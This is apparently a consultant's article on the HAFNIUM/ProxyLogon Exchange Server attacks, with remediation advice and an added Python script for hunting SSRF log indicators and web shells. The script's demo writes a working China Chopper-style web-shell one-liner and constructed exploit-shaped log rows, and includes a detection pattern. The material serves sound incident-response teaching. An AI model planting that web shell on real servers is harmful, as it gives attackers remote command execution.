HAFNIUM: An Unprecedented Attack
Manoje Chandran
Senior OT/IT Cyber Security Manager | Regional Consultant (Middle East/India)
HAFNIUM: The How, What, and Why of an Unprecedented Cybersecurity Attack.
Microsoft's out-of-band release of 2 March 2021, a week ahead of the regular 'Patch Tuesday', painted a previously unseen picture for the cybersecurity world: emergency security updates for on-premises Exchange Server (2013, 2016 and 2019, plus a defense-in-depth update for 2010) against four actively exploited vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, collectively known as ProxyLogon), in light of what is now notoriously known as the 'HAFNIUM Attack'.
The New Global Cybersecurity Threat on the Block.
HAFNIUM is out in the wild, hitting the business world by chaining several vulnerabilities in on-premises Microsoft Exchange Server. Exchange Online was not affected; the victims were SMBs, large enterprises and governments, anyone who ran the on-premises version with its web services reachable from the internet. More than 60,000 on-premises installations were reported compromised, and the count kept rising after the first HAFNIUM intrusions were identified. Within days it shaped into a 'Global Cybersecurity Crisis', posing a threat to commercial business and governance as a whole.
How HAFNIUM Came into Limelight.
From December 2020 through February 2021, several security firms found the vulnerabilities, observed them being exploited, and alerted Microsoft. Microsoft assessed the risk and released emergency patches. In its release notes, Microsoft attributed the attacks with high confidence to a cyber espionage group it named HAFNIUM, assessed to be state-sponsored and operating out of China, and initially described the exploitation as limited and targeted. It strongly urged customers to update their on-premises systems immediately.
The Real Problem: Floodgates Opened.
For those who thought HAFNIUM was a small glitch that a patch would fix, it turned out to be just the beginning. Once the vulnerabilities were public, every unpatched server was a free-for-all, and other threat actors quickly piled in. According to ESET research, at least 10 different APT groups were exploiting the vulnerabilities, and different active variants of the attacks were identified, including the human-operated ransomware DearCry (Microsoft's name for it: Ransom:Win32/DoejoCrypt). Microsoft stated in its update of 11 March that the impact of HAFNIUM saw a multi-fold increase when ransomware operators began taking advantage of the same Exchange vulnerabilities.
According to IT security firm Sophos, DearCry was being delivered through the same Exchange vulnerabilities, but with a twist. DearCry writes an encrypted copy of each file and then deletes the original. The attacker's RSA public key is embedded in the ransomware binary and used to protect the symmetric keys that encrypt the files, so the malware never needs to contact the attacker's command-and-control (C&C) server before encrypting a target; blocking C&C traffic therefore does not stop it. Several product and service providers in the cybersecurity sector noted that both the 'level of attacks' and the 'method of exploitation' were unprecedented.
Why Patching Alone Doesn’t Solve the Problem at Hand.
Industry-wide research shows that when a server is compromised, the attackers write web shells to it for future operations: a backdoor, typically an ASPX file dropped into an Exchange or IIS web directory, that lets them return over HTTPS without exploiting anything again and go on to privilege escalation, dumping mailboxes and credentials, planting ransomware, and compromising other systems in the network through lateral movement. Patching closes the entry point, but a web shell written before the patch keeps working, and any credentials already taken remain valid. Removing the vulnerability is therefore only the first step; the server has to be investigated and cleaned, which takes a well-defined process and careful execution.
For those who run on-premises Microsoft Exchange Server 2010, 2013, 2016 or 2019, we suggest:
- Apply the available patches immediately. If you cannot, apply Microsoft's interim mitigations or take the server off the internet, and conduct an in-depth risk assessment of the business impact of running it unpatched.
- Run trusted tools (the investigation script and mitigation tool listed below) to find and clean the infection. If you cannot clean it with confidence, reimage the system or restore it from a backup taken before the compromise, and patch before reconnecting it.
- Conduct a thorough threat-hunting exercise across the enterprise to identify other compromised systems; the web shell is the entry point, not the goal.
- Update or upgrade your security tools (endpoint, network and log monitoring) so they carry detections for these attack patterns.
- Ensure the backup process is effective and that you hold a clean, offline copy of critical files and images for the worst case; a backup the attacker can reach is not a backup.
- Regularly conduct threat assessments to evaluate your security posture.
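As a worked example of the hunting the steps above call for (added here; it is not part of the original article and not Microsoft's own Test-ProxyLogon.ps1 or mitigation tool), the Python below performs two of the checks a responder runs first: it parses Exchange HttpProxy log rows for the published CVE-2021-26855 indicator (an unauthenticated request whose AnchorMailbox matches ServerInfo~*/*), and it walks the directories where ProxyLogon web shells were dropped for script files that are newer than a chosen cutoff or contain an eval-of-request one-liner. The log rows, the cutoff date, the file contents and the directory list are constructed for the example; real logs carry many more columns, and the check on a live server should be done with Microsoft's script.

```python
"""Two triage checks for an on-premises Exchange server suspected of
ProxyLogon (CVE-2021-26855) exploitation. Added example, not Microsoft's
Test-ProxyLogon.ps1 or the EOMT; it runs offline against copied logs and
web roots, and all sample data below is constructed."""
import csv
import io
import os
import re
import tempfile
from datetime import datetime, timezone

# Check 1: the HttpProxy-log indicator for the SSRF.
# Real HttpProxy logs are CSV files with a header row and many more columns;
# this constructed sample keeps only the columns the check needs. Rows a2 and
# a3 are shaped like the published indicator: an empty AuthenticatedUser and
# an AnchorMailbox of the form ServerInfo~*/* naming a backend URL.
SAMPLE_HTTPPROXY_LOG = """\
DateTime,RequestId,Protocol,UrlStem,AuthenticatedUser,AnchorMailbox,ClientIpAddress,HttpStatus
2021-03-01T04:12:09.113Z,a1,Owa,/owa/,alice@corp.example,alice@corp.example,10.1.2.3,200
2021-03-01T04:13:41.502Z,a2,Ecp,/ecp/y.js,,ServerInfo~a]@mail.corp.example:444/ecp/DDI/DDIService.svc/GetObject,198.51.100.7,200
2021-03-01T04:13:42.880Z,a3,Ecp,/ecp/y.js,,ServerInfo~a]@mail.corp.example:444/ecp/proxyLogon.ecp,198.51.100.7,241
2021-03-01T04:20:00.000Z,a4,Autodiscover,/autodiscover/autodiscover.xml,bob@corp.example,bob@corp.example,10.1.2.9,200
2021-03-01T04:21:17.333Z,a5,Mapi,/mapi/emsmdb/,,,10.1.2.9,401
"""


def find_ssrf_indicators(log_text):
    """Rows where an unauthenticated request was anchored to an explicit
    backend target (AnchorMailbox matching ServerInfo~*/*), the HttpProxy-log
    pattern Microsoft published for CVE-2021-26855."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        anchor = row.get("AnchorMailbox") or ""
        unauthenticated = (row.get("AuthenticatedUser") or "") == ""
        if unauthenticated and anchor.startswith("ServerInfo~") and "/" in anchor:
            hits.append(row)
    return hits


def source_ips(rows):
    """Distinct client IPs behind the hits: the first pivot for wider hunting."""
    return sorted({r["ClientIpAddress"] for r in rows})


# Check 2: web-shell candidates under the Exchange web roots.
# Directories (relative to the install root / IIS root) where ProxyLogon web
# shells were reported dropped; illustrative, not a complete list.
WEB_SHELL_DIRS = (
    os.path.join("FrontEnd", "HttpProxy", "owa", "auth"),
    os.path.join("FrontEnd", "HttpProxy", "ecp", "auth"),
    os.path.join("inetpub", "wwwroot", "aspnet_client"),
)
SHELL_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asax")
# China Chopper style one-liner: server-side script that evals request input.
SHELL_PATTERN = re.compile(r"eval\s*\(\s*Request", re.I)
# Assumed cutoff: the last date the server was known to be clean.
DEMO_CUTOFF = datetime(2021, 1, 1, tzinfo=timezone.utc)


def find_webshell_candidates(root, newer_than=DEMO_CUTOFF):
    """Script files under the watched directories that were modified after
    NEWER_THAN or contain an eval-of-request body. Returns sorted paths
    relative to ROOT with forward slashes."""
    cutoff = newer_than.timestamp()
    found = set()
    for sub in WEB_SHELL_DIRS:
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for name in files:
                if not name.lower().endswith(SHELL_EXTENSIONS):
                    continue
                path = os.path.join(dirpath, name)
                recent = os.path.getmtime(path) >= cutoff
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    suspicious_body = bool(SHELL_PATTERN.search(fh.read()))
                if recent or suspicious_body:
                    found.add(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(found)


def build_demo_tree():
    """Constructed stand-in for an Exchange install: one legitimate OWA auth
    page dated mid-2020 and one dropped shell with today's timestamp."""
    root = tempfile.mkdtemp(prefix="exchange-demo-")
    auth = os.path.join(root, "FrontEnd", "HttpProxy", "owa", "auth")
    os.makedirs(auth)
    legit = os.path.join(auth, "logon.aspx")
    with open(legit, "w") as fh:
        fh.write('<%@ Page Language="C#" %><html>sign in</html>')
    old = datetime(2020, 6, 1, tzinfo=timezone.utc).timestamp()
    os.utime(legit, (old, old))
    with open(os.path.join(auth, "help.aspx"), "w") as fh:
        fh.write('<script language="JScript" runat="server">'
                 'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>')
    return root


def run_demo():
    """Run both checks on the constructed data and return what a hunter triages."""
    hits = find_ssrf_indicators(SAMPLE_HTTPPROXY_LOG)
    return {
        "ssrf_requests": [h["RequestId"] for h in hits],
        "source_ips": source_ips(hits),
        "webshell_candidates": find_webshell_candidates(build_demo_tree()),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Anything the first check flags is a request that reached a backend service without authentication, so pivot on those client IPs into firewall, IIS and OWA logs for the same window. The second check trades precision for recall: a cumulative update also writes fresh .aspx files into these directories, so compare candidates against a clean installation of the same build before deleting anything, and preserve the file and its timestamps for forensics.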
It is recommended to seek professional help to manage your enterprise security risks and reduce exposure to such lethal cyberattacks. Reach out to Vistas’ Cybersecurity Team for further assistance.
Key Resources for Investigation and Updates.
We have compiled a list of resources available online from the Microsoft Resource Center and other security vendors to help investigate and mitigate the rapidly spreading HAFNIUM threat.
- Microsoft Resource Center: Library of official Microsoft literature regarding HAFNIUM attacks
- Impact Investigation Guide: Step-by-step guide to detecting the indicators of HAFNIUM activity
- Impact Investigation Script: Script that searches Exchange logs for Indicators of Compromise (IOCs)
- CISA Tips Sheet: Steps for IT Security Staff to Remediate Microsoft Exchange Vulnerabilities
- MS Exchange On-premises Mitigation Tool: One-click tool that applies Microsoft's interim mitigation for the SSRF vulnerability and runs the Microsoft Safety Scanner; it does not install the security updates, which must still be applied
This is a real thing, and it's very serious. For everyone, ourselves included, it is time to take a step back and look at the bigger picture: review your processes, review your ecosystem and adjust where necessary.
Together we secure more.
Manoje.